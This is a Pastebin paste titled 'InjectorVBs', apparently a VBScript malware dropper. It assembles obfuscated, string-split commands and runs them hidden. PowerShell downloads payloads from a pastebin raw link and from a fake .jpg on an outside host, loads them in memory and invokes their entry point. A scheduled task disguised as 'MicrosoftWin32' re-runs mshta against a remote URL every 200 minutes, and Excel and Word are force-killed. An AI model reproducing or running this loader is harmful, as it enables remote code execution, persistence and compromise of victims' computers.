Advertisement
jccdt

InjectorVBs

Jun 25th, 2019
2,588
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.61 KB | None | 0 0
  1. Set As_wW = CreateObject("WScript.Shell")
  2. Dim AXW
  3. AXW1 = "pt.Shell"").Run(""powershell.exe -noexi"
  4. AXW5 = "ng('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/'+'e8GrYbHb'))).EntryPoint.Invoke($N,$N)"",0,true)(window.close)"
  5. AXW2 = "t -command [Reflection.Assembly]::Load("
  6. AXW4 = "-Object Net.WebClient).DownloadStri"
  7. AXW0 = "cmd.exe /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject(""Wscri"
  8. AXW3 = "[System.Convert]::FromBase64String((New"
  9. AXW = AXW0 + AXW1 + AXW2 + AXW3 + AXW4 + AXW5
  10. As_wW.Run AXW, vbHide
  11.  
  12. Set shell = CreateObject("WScript.Shell")
  13. shell.Run("Powershell.exe -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.m9c.net/uploads/15615146751.jpg'').replace(''*'',''x0'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)"),0
  14.  
  15. set Mi_G = CreateObject("WScript.Shell")
  16. Dim X_hw
  17. Link = "\"").Run(\""mshta.exe https://pastebin.com/raw/2HpiMFUJ\"",0,true)(window.close)"" /F "
  18. X_hw0 = "cmd.exe /c ping 127.0.0.1 -n 30 > nul & schtasks /create /sc MINUT"
  19. X_hw2 = "eObject(\""Wscript.Shell"
  20. Tym = "E /mo 200 /t"
  21. Name = "n ""MicrosoftWin32"" /t"
  22. X_hw1 = "r ""mshta vbscript:Creat"
  23. X_hw = X_hw0 + Tym + Name + X_hw1 + X_hw2 + Link
  24. Mi_G.run X_hw, vbHide
  25.  
  26. Set X7W832DSA = CreateObject("WScript.Shell")
  27. Dim ASSd712ji8asd
  28. ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%"" & taskkill /f /im EXCEL.EXE & taskkill /f /im WINWORD.EXE & exit"
  29. X7W832DSA.Run ASSd712ji8asd, vbHide
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement